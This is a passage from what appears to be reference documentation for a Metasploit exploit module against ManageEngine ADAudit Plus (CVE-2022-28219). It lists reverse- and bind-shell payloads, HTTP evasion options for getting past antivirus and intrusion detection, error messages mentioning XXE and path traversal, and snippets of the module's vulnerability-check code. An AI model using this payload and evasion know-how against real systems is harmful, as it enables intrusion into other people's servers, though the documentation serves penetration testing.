111 payload/cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp normal No Powershell Exec, Hidden Bind Ipknock TCP Stager
112 payload/cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp normal No Powershell Exec, Hidden Bind TCP Stager
113 payload/cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp normal No Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
114 payload/cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid normal No Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
115 payload/cmd/windows/powershell/patchupmeterpreter/bind_named_pipe normal No Powershell Exec, Windows x86 Bind Named Pipe Stager
116 payload/cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp normal No Powershell Exec, Bind TCP Stager (No NX or Win7)
117 payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp normal No Powershell Exec, Bind TCP Stager (Windows x86)
118 payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4 normal No Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
119 payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid normal No Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
120 payload/cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp normal No Powershell Exec, Reverse TCP Stager (IPv6)
121 payload/cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp normal No Powershell Exec, Reverse TCP Stager (No NX or Win7)
122 payload/cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp normal No Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
123 payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp normal No Powershell Exec, Reverse TCP Stager
124 payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports normal No Powershell Exec, Reverse All-Port TCP Stager
125 payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns normal No Powershell Exec, Reverse TCP Stager (DNS)
126 payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4 normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
127 payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
128 payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid normal No Powershell Exec, Reverse TCP Stager with UUID Support
129 payload/cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp normal No Powershell Exec, Hidden Bind Ipknock TCP Stager
130 payload/cmd/windows/powershell/peinject/bind_hidden_tcp normal No Powershell Exec, Hidden Bind TCP Stager
131 payload/cmd/windows/powershell/peinject/bind_ipv6_tcp normal No Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
132 payload/cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid normal No Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
133 payload/cmd/windows/powershell/peinject/bind_named_pipe normal No Powershell Exec, Windows x86 Bind Named Pipe Stager
134 payload/cmd/windows/powershell/peinject/bind_nonx_tcp normal No Powershell Exec, Bind TCP Stager (No NX or Win7)
135 payload/cmd/windows/powershell/peinject/bind_tcp normal No Powershell Exec, Bind TCP Stager (Windows x86)
136 payload/cmd/windows/powershell/peinject/bind_tcp_rc4 normal No Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
137 payload/cmd/windows/powershell/peinject/bind_tcp_uuid normal No Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
138 payload/cmd/windows/powershell/peinject/reverse_ipv6_tcp normal No Powershell Exec, Reverse TCP Stager (IPv6)
139 payload/cmd/windows/powershell/peinject/reverse_named_pipe normal No Powershell Exec, Windows x86 Reverse Named Pipe (SMB) Stager
140 payload/cmd/windows/powershell/peinject/reverse_nonx_tcp normal No Powershell Exec, Reverse TCP Stager (No NX or Win7)
141 payload/cmd/windows/powershell/peinject/reverse_ord_tcp normal No Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
142 payload/cmd/windows/powershell/peinject/reverse_tcp normal No Powershell Exec, Reverse TCP Stager
143 payload/cmd/windows/powershell/peinject/reverse_tcp_allports normal No Powershell Exec, Reverse All-Port TCP Stager
144 payload/cmd/windows/powershell/peinject/reverse_tcp_dns normal No Powershell Exec, Reverse TCP Stager (DNS)
145 payload/cmd/windows/powershell/peinject/reverse_tcp_rc4 normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
146 payload/cmd/windows/powershell/peinject/reverse_tcp_rc4_dns normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
147 payload/cmd/windows/powershell/peinject/reverse_tcp_uuid normal No Powershell Exec, Reverse TCP Stager with UUID Support
148 payload/cmd/windows/powershell/pingback_bind_tcp normal No Powershell Exec, Windows x86 Pingback, Bind TCP Inline
149 payload/cmd/windows/powershell/pingback_reverse_tcp normal No Powershell Exec, Windows x86 Pingback, Reverse TCP Inline
150 payload/cmd/windows/powershell/powershell_bind_tcp normal No Powershell Exec
151 payload/cmd/windows/powershell/powershell_reverse_tcp normal No Powershell Exec
152 payload/cmd/windows/powershell/powershell_reverse_tcp_ssl normal No Powershell Exec
153 payload/cmd/windows/powershell/shell/bind_hidden_ipknock_tcp normal No Powershell Exec, Windows Command Shell, Hidden Bind Ipknock TCP Stager
154 payload/cmd/windows/powershell/shell/bind_hidden_tcp normal No Powershell Exec, Windows Command Shell, Hidden Bind TCP Stager
155 payload/cmd/windows/powershell/shell/bind_ipv6_tcp normal No Powershell Exec, Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
156 payload/cmd/windows/powershell/shell/bind_ipv6_tcp_uuid normal No Powershell Exec, Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
157 payload/cmd/windows/powershell/shell/bind_named_pipe normal No Powershell Exec, Windows Command Shell, Windows x86 Bind Named Pipe Stager
158 payload/cmd/windows/powershell/shell/bind_nonx_tcp normal No Powershell Exec, Windows Command Shell, Bind TCP Stager (No NX or Win7)
159 payload/cmd/windows/powershell/shell/bind_tcp normal No Powershell Exec, Windows Command Shell, Bind TCP Stager (Windows x86)
160 payload/cmd/windows/powershell/shell/bind_tcp_rc4 normal No Powershell Exec, Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
161 payload/cmd/windows/powershell/shell/bind_tcp_uuid normal No Powershell Exec, Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
162 payload/cmd/windows/powershell/shell/reverse_ipv6_tcp normal No Powershell Exec, Windows Command Shell, Reverse TCP Stager (IPv6)
163 payload/cmd/windows/powershell/shell/reverse_nonx_tcp normal No Powershell Exec, Windows Command Shell, Reverse TCP Stager (No NX or Win7)
164 payload/cmd/windows/powershell/shell/reverse_ord_tcp normal No Powershell Exec, Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
165 payload/cmd/windows/powershell/shell/reverse_tcp normal No Powershell Exec, Windows Command Shell, Reverse TCP Stager
166 payload/cmd/windows/powershell/shell/reverse_tcp_allports normal No Powershell Exec, Windows Command Shell, Reverse All-Port TCP Stager
167 payload/cmd/windows/powershell/shell/reverse_tcp_dns normal No Powershell Exec, Windows Command Shell, Reverse TCP Stager (DNS)
168 payload/cmd/windows/powershell/shell/reverse_tcp_rc4 normal No Powershell Exec, Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
169 payload/cmd/windows/powershell/shell/reverse_tcp_rc4_dns normal No Powershell Exec, Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
170 payload/cmd/windows/powershell/shell/reverse_tcp_uuid normal No Powershell Exec, Windows Command Shell, Reverse TCP Stager with UUID Support
171 payload/cmd/windows/powershell/shell/reverse_udp normal No Powershell Exec, Windows Command Shell, Reverse UDP Stager with UUID Support
172 payload/cmd/windows/powershell/shell_bind_tcp normal No Powershell Exec, Windows Command Shell, Bind TCP Inline
173 payload/cmd/windows/powershell/shell_bind_tcp_xpfw normal No Powershell Exec, Windows Disable Windows ICF, Command Shell, Bind TCP Inline
174 payload/cmd/windows/powershell/shell_hidden_bind_tcp normal No Powershell Exec, Windows Command Shell, Hidden Bind TCP Inline
175 payload/cmd/windows/powershell/shell_reverse_tcp normal No Powershell Exec, Windows Command Shell, Reverse TCP Inline
176 payload/cmd/windows/powershell/speak_pwned normal No Powershell Exec
177 payload/cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp normal No Powershell Exec, Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
178 payload/cmd/windows/powershell/upexec/bind_hidden_tcp normal No Powershell Exec, Windows Upload/Execute, Hidden Bind TCP Stager
179 payload/cmd/windows/powershell/upexec/bind_ipv6_tcp normal No Powershell Exec, Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
180 payload/cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid normal No Powershell Exec, Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
181 payload/cmd/windows/powershell/upexec/bind_named_pipe normal No Powershell Exec, Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
182 payload/cmd/windows/powershell/upexec/bind_nonx_tcp normal No Powershell Exec, Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
183 payload/cmd/windows/powershell/upexec/bind_tcp normal No Powershell Exec, Windows Upload/Execute, Bind TCP Stager (Windows x86)
184 payload/cmd/windows/powershell/upexec/bind_tcp_rc4 normal No Powershell Exec, Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)
185 payload/cmd/windows/powershell/upexec/bind_tcp_uuid normal No Powershell Exec, Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
186 payload/cmd/windows/powershell/upexec/reverse_ipv6_tcp normal No Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (IPv6)
187 payload/cmd/windows/powershell/upexec/reverse_nonx_tcp normal No Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
188 payload/cmd/windows/powershell/upexec/reverse_ord_tcp normal No Powershell Exec, Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
189 payload/cmd/windows/powershell/upexec/reverse_tcp normal No Powershell Exec, Windows Upload/Execute, Reverse TCP Stager
190 payload/cmd/windows/powershell/upexec/reverse_tcp_allports normal No Powershell Exec, Windows Upload/Execute, Reverse All-Port TCP Stager
191 payload/cmd/windows/powershell/upexec/reverse_tcp_dns normal No Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (DNS)
192 payload/cmd/windows/powershell/upexec/reverse_tcp_rc4 normal No Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
193 payload/cmd/windows/powershell/upexec/reverse_tcp_rc4_dns normal No Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
194 payload/cmd/windows/powershell/upexec/reverse_tcp_uuid normal No Powershell Exec, Windows Upload/Execute, Reverse TCP Stager with UUID Support
195 payload/cmd/windows/powershell/upexec/reverse_udp normal No Powershell Exec, Windows Upload/Execute, Reverse UDP Stager with UUID Support
196 payload/cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp normal No Powershell Exec, Hidden Bind Ipknock TCP Stager
197 payload/cmd/windows/powershell/vncinject/bind_hidden_tcp normal No Powershell Exec, Hidden Bind TCP Stager
198 payload/cmd/windows/powershell/vncinject/bind_ipv6_tcp normal No Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
199 payload/cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid normal No Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
200 payload/cmd/windows/powershell/vncinject/bind_named_pipe normal No Powershell Exec, Windows x86 Bind Named Pipe Stager
201 payload/cmd/windows/powershell/vncinject/bind_nonx_tcp normal No Powershell Exec, Bind TCP Stager (No NX or Win7)
202 payload/cmd/windows/powershell/vncinject/bind_tcp normal No Powershell Exec, Bind TCP Stager (Windows x86)
203 payload/cmd/windows/powershell/vncinject/bind_tcp_rc4 normal No Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
204 payload/cmd/windows/powershell/vncinject/bind_tcp_uuid normal No Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
205 payload/cmd/windows/powershell/vncinject/reverse_hop_http normal No Powershell Exec, Reverse Hop HTTP/HTTPS Stager
206 payload/cmd/windows/powershell/vncinject/reverse_http normal No Powershell Exec, Windows Reverse HTTP Stager (wininet)
207 payload/cmd/windows/powershell/vncinject/reverse_http_proxy_pstore normal No Powershell Exec, Reverse HTTP Stager Proxy
208 payload/cmd/windows/powershell/vncinject/reverse_ipv6_tcp normal No Powershell Exec, Reverse TCP Stager (IPv6)
209 payload/cmd/windows/powershell/vncinject/reverse_nonx_tcp normal No Powershell Exec, Reverse TCP Stager (No NX or Win7)
210 payload/cmd/windows/powershell/vncinject/reverse_ord_tcp normal No Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
211 payload/cmd/windows/powershell/vncinject/reverse_tcp normal No Powershell Exec, Reverse TCP Stager
212 payload/cmd/windows/powershell/vncinject/reverse_tcp_allports normal No Powershell Exec, Reverse All-Port TCP Stager
213 payload/cmd/windows/powershell/vncinject/reverse_tcp_dns normal No Powershell Exec, Reverse TCP Stager (DNS)
214 payload/cmd/windows/powershell/vncinject/reverse_tcp_rc4 normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
215 payload/cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
216 payload/cmd/windows/powershell/vncinject/reverse_tcp_uuid normal No Powershell Exec, Reverse TCP Stager with UUID Support
217 payload/cmd/windows/powershell/vncinject/reverse_winhttp normal No Powershell Exec, Windows Reverse HTTP Stager (winhttp)
218 payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp normal No Powershell Exec, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager
219 payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid normal No Powershell Exec, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support
220 payload/cmd/windows/powershell/x64/custom/bind_named_pipe normal No Powershell Exec, Windows shellcode stage, Windows x64 Bind Named Pipe Stager
221 payload/cmd/windows/powershell/x64/custom/bind_tcp normal No Powershell Exec, Windows shellcode stage, Windows x64 Bind TCP Stager
222 payload/cmd/windows/powershell/x64/custom/bind_tcp_rc4 normal No Powershell Exec, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)
223 payload/cmd/windows/powershell/x64/custom/bind_tcp_uuid normal No Powershell Exec, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)
224 payload/cmd/windows/powershell/x64/custom/reverse_http normal No Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)
225 payload/cmd/windows/powershell/x64/custom/reverse_https normal No Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)
226 payload/cmd/windows/powershell/x64/custom/reverse_named_pipe normal No Powershell Exec, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager
227 payload/cmd/windows/powershell/x64/custom/reverse_tcp normal No Powershell Exec, Windows shellcode stage, Windows x64 Reverse TCP Stager
228 payload/cmd/windows/powershell/x64/custom/reverse_tcp_rc4 normal No Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
229 payload/cmd/windows/powershell/x64/custom/reverse_tcp_uuid normal No Powershell Exec, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)
230 payload/cmd/windows/powershell/x64/custom/reverse_winhttp normal No Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)
231 payload/cmd/windows/powershell/x64/custom/reverse_winhttps normal No Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)
232 payload/cmd/windows/powershell/x64/exec normal No Powershell Exec, Windows x64 Execute Command
233 payload/cmd/windows/powershell/x64/loadlibrary normal No Powershell Exec, Windows x64 LoadLibrary Path
234 payload/cmd/windows/powershell/x64/messagebox normal No Powershell Exec, Windows MessageBox x64
235 payload/cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp normal No Powershell Exec, Windows x64 IPv6 Bind TCP Stager
236 payload/cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid normal No Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support
237 payload/cmd/windows/powershell/x64/meterpreter/bind_named_pipe normal No Powershell Exec, Windows x64 Bind Named Pipe Stager
238 payload/cmd/windows/powershell/x64/meterpreter/bind_tcp normal No Powershell Exec, Windows x64 Bind TCP Stager
239 payload/cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4 normal No Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
240 payload/cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid normal No Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)
241 payload/cmd/windows/powershell/x64/meterpreter/reverse_http normal No Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)
242 payload/cmd/windows/powershell/x64/meterpreter/reverse_https normal No Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)
243 payload/cmd/windows/powershell/x64/meterpreter/reverse_named_pipe normal No Powershell Exec, Windows x64 Reverse Named Pipe (SMB) Stager
244 payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp normal No Powershell Exec, Windows x64 Reverse TCP Stager
245 payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4 normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
246 payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid normal No Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)
247 payload/cmd/windows/powershell/x64/meterpreter/reverse_winhttp normal No Powershell Exec, Windows x64 Reverse HTTP Stager (winhttp)
248 payload/cmd/windows/powershell/x64/meterpreter/reverse_winhttps normal No Powershell Exec, Windows x64 Reverse HTTPS Stager (winhttp)
249 payload/cmd/windows/powershell/x64/peinject/bind_ipv6_tcp normal No Powershell Exec, Windows x64 IPv6 Bind TCP Stager
250 payload/cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid normal No Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support
251 payload/cmd/windows/powershell/x64/peinject/bind_named_pipe normal No Powershell Exec, Windows x64 Bind Named Pipe Stager
252 payload/cmd/windows/powershell/x64/peinject/bind_tcp normal No Powershell Exec, Windows x64 Bind TCP Stager
253 payload/cmd/windows/powershell/x64/peinject/bind_tcp_rc4 normal No Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
254 payload/cmd/windows/powershell/x64/peinject/bind_tcp_uuid normal No Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)
255 payload/cmd/windows/powershell/x64/peinject/reverse_named_pipe normal No Powershell Exec, Windows x64 Reverse Named Pipe (SMB) Stager
256 payload/cmd/windows/powershell/x64/peinject/reverse_tcp normal No Powershell Exec, Windows x64 Reverse TCP Stager
257 payload/cmd/windows/powershell/x64/peinject/reverse_tcp_rc4 normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
258 payload/cmd/windows/powershell/x64/peinject/reverse_tcp_uuid normal No Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)
259 payload/cmd/windows/powershell/x64/pingback_reverse_tcp normal No Powershell Exec, Windows x64 Pingback, Reverse TCP Inline
260 payload/cmd/windows/powershell/x64/powershell_bind_tcp normal No Powershell Exec
261 payload/cmd/windows/powershell/x64/powershell_reverse_tcp normal No Powershell Exec
262 payload/cmd/windows/powershell/x64/powershell_reverse_tcp_ssl normal No Powershell Exec
263 payload/cmd/windows/powershell/x64/shell/bind_ipv6_tcp normal No Powershell Exec, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
264 payload/cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid normal No Powershell Exec, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
265 payload/cmd/windows/powershell/x64/shell/bind_named_pipe normal No Powershell Exec, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
266 payload/cmd/windows/powershell/x64/shell/bind_tcp normal No Powershell Exec, Windows x64 Command Shell, Windows x64 Bind TCP Stager
267 payload/cmd/windows/powershell/x64/shell/bind_tcp_rc4 normal No Powershell Exec, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
268 payload/cmd/windows/powershell/x64/shell/bind_tcp_uuid normal No Powershell Exec, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
269 payload/cmd/windows/powershell/x64/shell/reverse_tcp normal No Powershell Exec, Windows x64 Command Shell, Windows x64 Reverse TCP Stager
270 payload/cmd/windows/powershell/x64/shell/reverse_tcp_rc4 normal No Powershell Exec, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
271 payload/cmd/windows/powershell/x64/shell/reverse_tcp_uuid normal No Powershell Exec, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
272 payload/cmd/windows/powershell/x64/shell_bind_tcp normal No Powershell Exec, Windows x64 Command Shell, Bind TCP Inline
273 payload/cmd/windows/powershell/x64/shell_reverse_tcp normal No Powershell Exec, Windows x64 Command Shell, Reverse TCP Inline
274 payload/cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp normal No Powershell Exec, Windows x64 IPv6 Bind TCP Stager
275 payload/cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid normal No Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support
276 payload/cmd/windows/powershell/x64/vncinject/bind_named_pipe normal No Powershell Exec, Windows x64 Bind Named Pipe Stager
277 payload/cmd/windows/powershell/x64/vncinject/bind_tcp normal No Powershell Exec, Windows x64 Bind TCP Stager
278 payload/cmd/windows/powershell/x64/vncinject/bind_tcp_rc4 normal No Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
279 payload/cmd/windows/powershell/x64/vncinject/bind_tcp_uuid normal No Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)
280 payload/cmd/windows/powershell/x64/vncinject/reverse_http normal No Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)
281 payload/cmd/windows/powershell/x64/vncinject/reverse_https normal No Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)
282 payload/cmd/windows/powershell/x64/vncinject/reverse_tcp normal No Powershell Exec, Windows x64 Reverse TCP Stager
283 payload/cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4 normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
284 payload/cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid normal No Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)
285 payload/cmd/windows/powershell/x64/vncinject/reverse_winhttp normal No Powershell Exec, Windows x64 Reverse HTTP Stager (winhttp)
286 payload/cmd/windows/powershell/x64/vncinject/reverse_winhttps normal No Powershell Exec, Windows x64 Reverse HTTPS Stager (winhttp)
287 payload/cmd/windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
288 payload/cmd/windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
289 payload/cmd/windows/powershell_reverse_tcp_ssl normal No Windows Interactive Powershell Session, Reverse TCP SSL
290 payload/cmd/windows/reverse_lua normal No Windows Command Shell, Reverse TCP (via Lua)
291 payload/cmd/windows/reverse_perl normal No Windows Command, Double Reverse TCP Connection (via Perl)
292 payload/cmd/windows/reverse_powershell normal No Windows Command Shell, Reverse TCP (via Powershell)
293 payload/cmd/windows/reverse_ruby normal No Windows Command Shell, Reverse TCP (via Ruby)
294 payload/generic/custom normal No Custom Payload
295 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
296 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
297 payload/generic/ssh/interact normal No Interact with Established SSH Connection
Evasion Options
Here is the full list of possible evasion options supported by the windows/http/manageengine_adaudit_plus_cve_2022_28219 exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::chunked false no Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression none no Enable compression of HTTP responses via content encoding (Accepted: none, gzip, defl
ate)
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::junk_headers false no Enable insertion of random junk HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::no_cache false no Disallow the browser to cache HTTP content
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apac
he)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apa
che)
HTTP::server_name Apache yes Configures the Server header of all outgoing replies
HTTP::shuffle_get_params false no Randomize order of GET parameters
HTTP::shuffle_post_params false no Randomize order of POST parameters
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all,
u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Target failed to respond to check.
- Does not appear to be ADAudit Plus
- Target failed to respond to check.
- Target does not have vulnerable endpoint (likely patched).
- The vulnerable endpoint responds with HTTP/200.
- Failed to get a list of users (check your DOMAIN, or server may not be vulnerable)
- Failed to find any non-default user accounts
- Exploit appeared to work, but could not find the payload on the target
- Found <POSSIBLE_PAYLOADS.LENGTH> apparent payloads in temp folders - aborting!
- Path traversal request failed with HTTP/<VALUE>
- XXE request to get directory listing failed with HTTP/<VALUE>
- FTP reverse connection for directory enumeration failed - <FTP_URL>
- Did not receive data from our reverse FTP connection
- Didn't receive expected FTP connection
- FTP client connected, but we did not receive any data over the socket
- Couldn't get directory listing for <DIR>
- XXE request to upload file did not receive a reverse connection on <SRVPORT_HTTP2>
- XXE request to upload payload failed with HTTP/<VALUE>
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Target failed to respond to check.
Here is a relevant code snippet related to the "Target failed to respond to check." error message:
91: 'method' => 'GET',
92: 'uri' => '/'
93: )
94:
95: unless res1
96: return CheckCode::Unknown('Target failed to respond to check.')
97: end
98:
99: unless res1.code == 200 && res1.body.match?(/<title>ADAudit Plus/)
100: return CheckCode::Safe('Does not appear to be ADAudit Plus')
101: end
Does not appear to be ADAudit Plus
Here is a relevant code snippet related to the "Does not appear to be ADAudit Plus" error message:
95: unless res1
96: return CheckCode::Unknown('Target failed to respond to check.')
97: end
98:
99: unless res1.code == 200 && res1.body.match?(/<title>ADAudit Plus/)
100: return CheckCode::Safe('Does not appear to be ADAudit Plus')
101: end
102:
103: # Check if it's a vulnerable version (the patch removes the /cewolf endpoint
104: # entirely)
105: res2 = send_request_cgi(
Target failed to respond to check.
Here is a relevant code snippet related to the "Target failed to respond to check." error message:
106: 'method' => 'GET',
107: 'uri' => normalize_uri("#{datastore['TARGETURI_DESERIALIZATION']}?img=abc")
108: )
109:
110: unless res2
111: return CheckCode::Unknown('Target failed to respond to check.')
112: end
113:
114: unless res2.code == 200
115: return CheckCode::Safe('Target does not have vulnerable endpoint (likely patched).')
116: end
Target does not have vulnerable endpoint (likely patched).
Here is a relevant code snippet related to the "Target does not have vulnerable endpoint (likely patched)." error message:
110: unless res2
111: return CheckCode::Unknown('Target failed to respond to check.')
112: end
113:
114: unless res2.code == 200
115: return CheckCode::Safe('Target does not have vulnerable endpoint (likely patched).')
116: end
117:
118: CheckCode::Vulnerable('The vulnerable endpoint responds with HTTP/200.')
119: end
120:
The vulnerable endpoint responds with HTTP/200.
Here is a relevant code snippet related to the "The vulnerable endpoint responds with HTTP/200." error message:
113:
114: unless res2.code == 200
115: return CheckCode::Safe('Target does not have vulnerable endpoint (likely patched).')
116: end
117:
118: CheckCode::Vulnerable('The vulnerable endpoint responds with HTTP/200.')
119: end
120:
121: def exploit
122: # List the /users folder - this is good to do first, since we can fail early
123: # if something isn't working
Failed to get a list of users (check your DOMAIN, or server may not be vulnerable)
Here is a relevant code snippet related to the "Failed to get a list of users (check your DOMAIN, or server may not be vulnerable)" error message:
